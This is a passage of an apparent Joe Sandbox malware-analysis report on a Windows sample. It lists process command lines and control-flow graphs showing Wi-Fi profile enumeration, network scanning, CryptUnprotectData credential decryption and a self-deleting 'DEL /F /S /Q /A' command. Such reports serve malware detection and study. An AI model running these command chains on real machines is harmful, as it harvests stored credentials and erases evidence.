                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:18:06:56
                                                                          Start date:06/11/2024
                                                                          Path:C:\Windows\System32\chcp.com
                                                                          Wow64 process (32bit):false
                                                                          Commandline:chcp 65001
                                                                          Imagebase:0x7ff740a70000
                                                                          File size:14'848 bytes
                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:18:06:56
                                                                          Start date:06/11/2024
                                                                          Path:C:\Windows\System32\netsh.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:netsh wlan show profiles
                                                                          Imagebase:0x7ff7e8b80000
                                                                          File size:96'768 bytes
                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:18:06:56
                                                                          Start date:06/11/2024
                                                                          Path:C:\Windows\System32\findstr.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:findstr /R /C:"[ ]:[ ]"
                                                                          Imagebase:0x7ff798080000
                                                                          File size:36'352 bytes
                                                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:7
                                                                          Start time:18:06:57
                                                                          Start date:06/11/2024
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                                                                          Imagebase:0x7ff6ce510000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:18:06:57
                                                                          Start date:06/11/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:9
                                                                          Start time:18:06:57
                                                                          Start date:06/11/2024
                                                                          Path:C:\Windows\System32\chcp.com
                                                                          Wow64 process (32bit):false
                                                                          Commandline:chcp 65001
                                                                          Imagebase:0x7ff740a70000
                                                                          File size:14'848 bytes
                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:10
                                                                          Start time:18:06:57
                                                                          Start date:06/11/2024
                                                                          Path:C:\Windows\System32\netsh.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:netsh wlan show networks mode=bssid
                                                                          Imagebase:0x7ff7e8b80000
                                                                          File size:96'768 bytes
                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:11
                                                                          Start time:18:06:57
                                                                          Start date:06/11/2024
                                                                          Path:C:\Windows\System32\findstr.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:findstr "SSID BSSID Signal"
                                                                          Imagebase:0x7ff798080000
                                                                          File size:36'352 bytes
                                                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:12
                                                                          Start time:18:07:00
                                                                          Start date:06/11/2024
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0x7ff6ce510000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:13
                                                                          Start time:18:07:00
                                                                          Start date:06/11/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:14
                                                                          Start time:18:07:01
                                                                          Start date:06/11/2024
                                                                          Path:C:\Windows\System32\chcp.com
                                                                          Wow64 process (32bit):false
                                                                          Commandline:chcp 65001
                                                                          Imagebase:0x7ff740a70000
                                                                          File size:14'848 bytes
                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:15
                                                                          Start time:18:07:01
                                                                          Start date:06/11/2024
                                                                          Path:C:\Windows\System32\timeout.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:timeout /t 3
                                                                          Imagebase:0x7ff76f9d0000
                                                                          File size:32'768 bytes
                                                                          MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:19.9%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:33.3%
                                                                            Total number of Nodes:9
                                                                            Total number of Limit Nodes:1
                                                                            execution_graph 6837 7ff848e66219 6840 7ff848e6622f 6837->6840 6838 7ff848e6634b 6839 7ff848e6645c LoadLibraryExW 6842 7ff848e664bc 6839->6842 6840->6838 6840->6839 6841 7ff848e66368 6840->6841 6847 7ff848e67bb1 6848 7ff848e67bdf CryptUnprotectData 6847->6848 6850 7ff848e67de9 6848->6850
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: jCH$jCH
                                                                            • API String ID: 0-284820611
                                                                            • Opcode ID: 36b0d51e7d435d0710047bf06a6f6d126e76cf1ef89ce9fa90086ad9cf650820
                                                                            • Instruction ID: 1886d5a6a137432c4c85b1d27f7fb453ddd8b762369a30b2f94832976b1525d4
                                                                            • Opcode Fuzzy Hash: 36b0d51e7d435d0710047bf06a6f6d126e76cf1ef89ce9fa90086ad9cf650820
                                                                            • Instruction Fuzzy Hash: B1D26F30A1C9499FDB95EF2CC894AA93BE1FF59344F5405B9E44EDB2A6CB35E802C740

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 521 7ff848e67bb1-7ff848e67bf5 523 7ff848e67c3f-7ff848e67cd6 521->523 524 7ff848e67bf7-7ff848e67c3a 521->524 527 7ff848e67cd8-7ff848e67cdc 523->527 528 7ff848e67d47-7ff848e67d5c 523->528 524->523 530 7ff848e67cde-7ff848e67cf9 527->530 531 7ff848e67d2b-7ff848e67d46 527->531 532 7ff848e67d64-7ff848e67de7 CryptUnprotectData 528->532 530->531 531->528 534 7ff848e67def-7ff848e67e61 532->534 535 7ff848e67de9 532->535 535->534
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CryptDataUnprotect
                                                                            • String ID:
                                                                            • API String ID: 834300711-0
                                                                            • Opcode ID: b1fe54e2a1edd32d4e392cf3f3b198e5f4431e767f0b315bde8fd35e0da87acc
                                                                            • Instruction ID: ffe862d24e2743d4bf798a5752def2ee9ae89be3debd11ca301054f4dd5bb581
                                                                            • Opcode Fuzzy Hash: b1fe54e2a1edd32d4e392cf3f3b198e5f4431e767f0b315bde8fd35e0da87acc
                                                                            • Instruction Fuzzy Hash: FD814770D08A5D8FEB98EF18C845BE9BBF1FB59340F0052AAD44DE3251DB74A9848F85

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 541 7ff848e67cfd-7ff848e67de7 CryptUnprotectData 546 7ff848e67def-7ff848e67e61 541->546 547 7ff848e67de9 541->547 547->546
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CryptDataUnprotect
                                                                            • String ID:
                                                                            • API String ID: 834300711-0
                                                                            • Opcode ID: 36755ca945adb6504da9d91b8c17dae2be98733c2f3b12057c563c7e2100d326
                                                                            • Instruction ID: 4cb3a0c3c03e7639a959b13e25db243191f694a5169f7a33ccedb3db7b14b6ab
                                                                            • Opcode Fuzzy Hash: 36755ca945adb6504da9d91b8c17dae2be98733c2f3b12057c563c7e2100d326
                                                                            • Instruction Fuzzy Hash: E041C970D19A1D8FDBA4EF18C885BE9B7B1FB59300F4052A9D40DE3251DB74AA84CF45

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 883 7ff848e6bdf8-7ff848e6be2d 885 7ff848e6be33-7ff848e6be69 call 7ff848e605f0 * 2 883->885 886 7ff848e6bef0-7ff848e6bf21 call 7ff848e605f0 883->886 896 7ff848e6be6b 885->896 897 7ff848e6be70-7ff848e6be9c call 7ff848e605f0 885->897 892 7ff848e6bf28-7ff848e6bf3c call 7ff848e61f60 886->892 893 7ff848e6bf23 886->893 898 7ff848e6bf41-7ff848e6bf72 892->898 893->892 896->897 909 7ff848e6be9e 897->909 910 7ff848e6bea3-7ff848e6beef 897->910 899 7ff848e6bf78-7ff848e6bf8c 898->899 900 7ff848e6c502-7ff848e6c53d call 7ff848e6d148 898->900 902 7ff848e6c344-7ff848e6c366 call 7ff848e605f0 899->902 903 7ff848e6bf92-7ff848e6bfc0 call 7ff848e65d48 899->903 927 7ff848e6c543-7ff848e6c54f 900->927 928 7ff848e6c6b1-7ff848e6cf8f call 7ff848e69988 900->928 916 7ff848e6c36d-7ff848e6c39f 902->916 917 7ff848e6c368 902->917 915 7ff848e6c327-7ff848e6c337 903->915 909->910 910->886 920 7ff848e6c33d-7ff848e6c33f 915->920 921 7ff848e6bfc5-7ff848e6bfd6 915->921 922 7ff848e6c3a6-7ff848e6c3e3 916->922 923 7ff848e6c3a1 916->923 917->916 929 7ff848e6c501 920->929 925 7ff848e6bfdd-7ff848e6bffe 921->925 926 7ff848e6bfd8 921->926 939 7ff848e6c4ea-7ff848e6c4fa 922->939 923->922 925->915 926->925 930 7ff848e6c5a8-7ff848e6c5d1 call 7ff848e65248 927->930 931 7ff848e6c551-7ff848e6c558 927->931 929->900 942 7ff848e6c5d4-7ff848e6c672 call 7ff848e65258 call 7ff848e65268 930->942 941 7ff848e6c55a 931->941 931->942 946 7ff848e6c3e8-7ff848e6c3f9 939->946 947 7ff848e6c500 939->947 944 7ff848e6c59c-7ff848e6c5a7 941->944 945 7ff848e6c55c-7ff848e6c569 941->945 942->928 944->930 945->944 949 7ff848e6c3fb 946->949 950 7ff848e6c400-7ff848e6c455 call 7ff848e62328 946->950 947->929 949->950 959 7ff848e6c4db-7ff848e6c4e4 950->959 960 7ff848e6c45b-7ff848e6c478 950->960 959->939 960->959
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8863a4a7fe5f5ae4c69308b6fa715dbf21dd20daa7574e001818c65bc9bc28f1
                                                                            • Instruction ID: 6a1815a8e05605353e54d5b8009568f781641f64a1eccf70056f798bd936474c
                                                                            • Opcode Fuzzy Hash: 8863a4a7fe5f5ae4c69308b6fa715dbf21dd20daa7574e001818c65bc9bc28f1
                                                                            • Instruction Fuzzy Hash: 83F10A3090992D8FDBA9EF14C894BA9B7B1FF59341F5045E9D00EE7291DB35AA81CF04

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1303 7ff848e6d4c1-7ff848e6d4f4 1305 7ff848e6d69d-7ff848e6d6c8 1303->1305 1306 7ff848e6d4fa-7ff848e6d4fb call 7ff848e69bf0 1303->1306 1308 7ff848e6d6c9-7ff848e6d6d9 1305->1308 1309 7ff848e6d500-7ff848e6d53d 1306->1309 1311 7ff848e6d6df-7ff848e6d6e5 1308->1311 1314 7ff848e6d696-7ff848e6d698 1309->1314 1315 7ff848e6d543-7ff848e6d54c 1309->1315 1313 7ff848e6d6e8-7ff848e6d6ef 1311->1313 1316 7ff848e6d71a-7ff848e6d747 1313->1316 1317 7ff848e6d6f1-7ff848e6d6fa call 7ff848e69bd8 1313->1317 1314->1316 1318 7ff848e6d54e-7ff848e6d551 1315->1318 1319 7ff848e6d5a5-7ff848e6d5d0 1315->1319 1331 7ff848e6d74d-7ff848e6d791 1316->1331 1332 7ff848e6df99-7ff848e6dfa6 call 7ff848e69988 1316->1332 1323 7ff848e6d6ff-7ff848e6d715 1317->1323 1321 7ff848e6d5d2-7ff848e6d5f4 call 7ff848e65258 1318->1321 1322 7ff848e6d553-7ff848e6d555 1318->1322 1327 7ff848e6d5d1 1319->1327 1342 7ff848e6d5f5-7ff848e6d658 call 7ff848e65268 call 7ff848e65278 call 7ff848e65288 1321->1342 1326 7ff848e6d557 1322->1326 1322->1327 1330 7ff848e6dfc3-7ff848e6dfd1 1323->1330 1328 7ff848e6d599-7ff848e6d59a 1326->1328 1329 7ff848e6d559-7ff848e6d560 1326->1329 1327->1321 1328->1319 1329->1328 1335 7ff848e6d7b9-7ff848e6d7d5 1331->1335 1336 7ff848e6d793-7ff848e6d7b7 1331->1336 1344 7ff848e6dfab-7ff848e6dfc1 1332->1344 1339 7ff848e6d7df-7ff848e6d7f6 call 7ff848e65d78 1335->1339 1336->1339 1345 7ff848e6d7fb-7ff848e6d82a 1339->1345 1342->1308 1354 7ff848e6d65a-7ff848e6d65e 1342->1354 1344->1330 1345->1332 1354->1311 1355 7ff848e6d660-7ff848e6d66c 1354->1355 1355->1313 1357 7ff848e6d66e 1355->1357 1357->1342 1358 7ff848e6d670-7ff848e6d695 call 7ff848e697e8 1357->1358 1358->1314
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2c075cfe8901b05adca58722d8fcff05fef327f428dc4cab19c6f5e7f1983daf
                                                                            • Instruction ID: c6780f9989ebadcef07b962b534b3b5d94034485009244c05e90758017965328
                                                                            • Opcode Fuzzy Hash: 2c075cfe8901b05adca58722d8fcff05fef327f428dc4cab19c6f5e7f1983daf
                                                                            • Instruction Fuzzy Hash: 0EB1D87090962D8FDBA4EF18C894BE9B7B1FF59301F9001A9D04DE7291DB35AA85CF04

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1361 7ff848e6ad9e-7ff848e6ae2f call 7ff848e61190 call 7ff848e65d28 1369 7ff848e6b1a5-7ff848e6cf8f call 7ff848e69988 1361->1369 1370 7ff848e6ae35-7ff848e6ae53 call 7ff848e605f0 1361->1370 1376 7ff848e6ae5a-7ff848e6ae91 1370->1376 1377 7ff848e6ae55 1370->1377 1382 7ff848e6ae98-7ff848e6aee3 1376->1382 1383 7ff848e6ae93 1376->1383 1377->1376 1385 7ff848e6aeea-7ff848e6af2c call 7ff848e605a8 1382->1385 1386 7ff848e6aee5 1382->1386 1383->1382 1389 7ff848e6af32-7ff848e6af3e 1385->1389 1390 7ff848e6b031-7ff848e6b033 1385->1390 1386->1385 1392 7ff848e6af97-7ff848e6afa9 call 7ff848e65248 1389->1392 1393 7ff848e6af40-7ff848e6af43 1389->1393 1391 7ff848e6b036-7ff848e6b044 1390->1391 1396 7ff848e6b046-7ff848e6b05e call 7ff848e605d0 1391->1396 1397 7ff848e6b063-7ff848e6b073 1391->1397 1404 7ff848e6afae-7ff848e6afc2 call 7ff848e65258 1392->1404 1394 7ff848e6afc4-7ff848e6afc5 1393->1394 1395 7ff848e6af45-7ff848e6af47 1393->1395 1394->1391 1411 7ff848e6afc6-7ff848e6afc7 1394->1411 1399 7ff848e6af49 1395->1399 1400 7ff848e6afc3 1395->1400 1417 7ff848e6b1a4 1396->1417 1402 7ff848e6b079-7ff848e6b0a7 1397->1402 1403 7ff848e6b111-7ff848e6b141 call 7ff848e65d38 1397->1403 1406 7ff848e6af8b-7ff848e6af95 1399->1406 1407 7ff848e6af4b-7ff848e6af52 1399->1407 1400->1394 1402->1403 1418 7ff848e6b18f-7ff848e6b1a1 1403->1418 1404->1400 1406->1392 1407->1406 1411->1390 1417->1369 1419 7ff848e6b143-7ff848e6b154 1418->1419 1420 7ff848e6b1a3 1418->1420 1421 7ff848e6b15b-7ff848e6b17a call 7ff848e605d0 1419->1421 1422 7ff848e6b156 1419->1422 1420->1417 1424 7ff848e6b17f-7ff848e6b189 1421->1424 1422->1421 1424->1418
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 65d8b810ba4555bacd3d6654cf2568387294f62e4c5eb5f141eba8cbc32a9c39
                                                                            • Instruction ID: 3c23561947b0370edb436c7b35a92d3307f627ea31b51a4a250d77cc7f0cd8a7
                                                                            • Opcode Fuzzy Hash: 65d8b810ba4555bacd3d6654cf2568387294f62e4c5eb5f141eba8cbc32a9c39
                                                                            • Instruction Fuzzy Hash: D1B1E570D1992D8FEBA5EB18C899BA9B7B1FF59340F4001E9D00DE3292DB35A981CF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c8e622a6f61604c3a8ff310ef609eaca9b72c86001602ef008a28a787abea7f9
                                                                            • Instruction ID: a5d55a18de9edbc6a0de9e57066f35c2f9a3ef5d1b6fb70b11fecab9c49e2351
                                                                            • Opcode Fuzzy Hash: c8e622a6f61604c3a8ff310ef609eaca9b72c86001602ef008a28a787abea7f9
                                                                            • Instruction Fuzzy Hash: 10C01232A00409CECB10EE68E4010FAB331EF86299F50247AD128E3181CB32E8218B88

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 14426be66536099592767ec6ede468d6feb847dccf75069c38ef365b46ac1228
                                                                            • Instruction ID: c9a6f40798cf2aa8c3c26452ba30c9a6b4a003d763f8dfcbea90c49960cbf17c
                                                                            • Opcode Fuzzy Hash: 14426be66536099592767ec6ede468d6feb847dccf75069c38ef365b46ac1228
                                                                            • Instruction Fuzzy Hash: 42B1AF70A1CA0D8FEB98EF58D8856B8B7F1FB59310F54016ED04DD7262DB35A846CB44
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c5b05c33cc7c4bf268aa1bc1bc85a49e2dcf2a1b61632639847615bba77c5949
                                                                            • Instruction ID: 188e62c171744a4dadb062c4b892bff1df170a5c14d3be1d165eda590d5dfdd9
                                                                            • Opcode Fuzzy Hash: c5b05c33cc7c4bf268aa1bc1bc85a49e2dcf2a1b61632639847615bba77c5949
                                                                            • Instruction Fuzzy Hash: 27128E30918A8D8FEB68EF28C855BE977E0FB59350F50427ED84EC7292DB34A541CB45
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: df1b4ab92cc3ac5a472fa870efb0ced4988fc734d64f112789eebc435cbc3147
                                                                            • Instruction ID: 96294dc1823fa5b43a885eefd454310163fe81d8a7f9aebe7306108dec2385cf
                                                                            • Opcode Fuzzy Hash: df1b4ab92cc3ac5a472fa870efb0ced4988fc734d64f112789eebc435cbc3147
                                                                            • Instruction Fuzzy Hash: B1816D70908A8D8FDFA8EF18C845BE97BE1FF59350F10412AE84DC7252DB74A985CB81
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cd129a5aa5f54d0a865b03f5a47e5e28913c28f7078e00d5006f6413cfeafa84
                                                                            • Instruction ID: e7b4a131baf567b07652458db41f8e048e50933eb7f49e4f8dc98e7ae1918463
                                                                            • Opcode Fuzzy Hash: cd129a5aa5f54d0a865b03f5a47e5e28913c28f7078e00d5006f6413cfeafa84
                                                                            • Instruction Fuzzy Hash: 21411430D0D65E9FDB88EB98C494BADB7B2FF59300F6041A9D00DE7295CB39A981CB54
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9f8b8721cd0380bd9af126730047a4c02c84e9571374870e844b013408725e66
                                                                            • Instruction ID: 81deba7e1c2a49922f8e76a073abeeca301ad4d2501deeb0f2aa29d854975d62
                                                                            • Opcode Fuzzy Hash: 9f8b8721cd0380bd9af126730047a4c02c84e9571374870e844b013408725e66
                                                                            • Instruction Fuzzy Hash: 1F31C630D095199FCB95EF68D894AEDB7B5FF5A300F5051A9D00EE7292CB34AA80CF05
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: febc4b46c5dbea5b7f0038d34f5046f2d43072783de860d1373c22a226977517
                                                                            • Instruction ID: fce5162486ddd7d625557ad3591cba04566190997175313c6cca23630764b63f
                                                                            • Opcode Fuzzy Hash: febc4b46c5dbea5b7f0038d34f5046f2d43072783de860d1373c22a226977517
                                                                            • Instruction Fuzzy Hash: 9F313A3180962C8AEB68EB25E8907F9B3B1FF55310F4451ADD04D97281DF36AA85DF50
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d3915934fdf88ba708311633cc7dd37f12f2e2f401f4ed8a2ca3817cc24f9a00
                                                                            • Instruction ID: 99a29d3ba7736271565863f3a1bdbd062e7fae456903371e76f3d93bae859b14
                                                                            • Opcode Fuzzy Hash: d3915934fdf88ba708311633cc7dd37f12f2e2f401f4ed8a2ca3817cc24f9a00
                                                                            • Instruction Fuzzy Hash: 40F03A70D0892CCECB64EF68C4406E8B3B1FF19354F8046E9D22DE3281CB75AA808F48
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 78fc818fb92ffae9c7a2f693544543cd609faa7795796f6c0865e41c41638fcd
                                                                            • Instruction ID: 195605937a89f9a90f6843a26c4f4aa29b10cea3a94c4b5457dc2f8ecad1aa55
                                                                            • Opcode Fuzzy Hash: 78fc818fb92ffae9c7a2f693544543cd609faa7795796f6c0865e41c41638fcd
                                                                            • Instruction Fuzzy Hash: 31F0A470D0C91D8ECB65EF1884406F8B3B1FB59344F8055B9D11DE3242CB35A9808F88
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2087094201.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff848e60000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 667108748eed591d9f187f877aec91609388187d4e187041dad7cf5d7fbc2d07
                                                                            • Instruction ID: 543009d10db4f9d777d6fd50bb21a8e53eb5a12cc3b9eb48d80cab3b1848ca97
                                                                            • Opcode Fuzzy Hash: 667108748eed591d9f187f877aec91609388187d4e187041dad7cf5d7fbc2d07
                                                                            • Instruction Fuzzy Hash: F3F0A470D0C61D8ECBA5EF1884406E8B3B1FB59344F8055A9D11DE3251CB35AA80CF48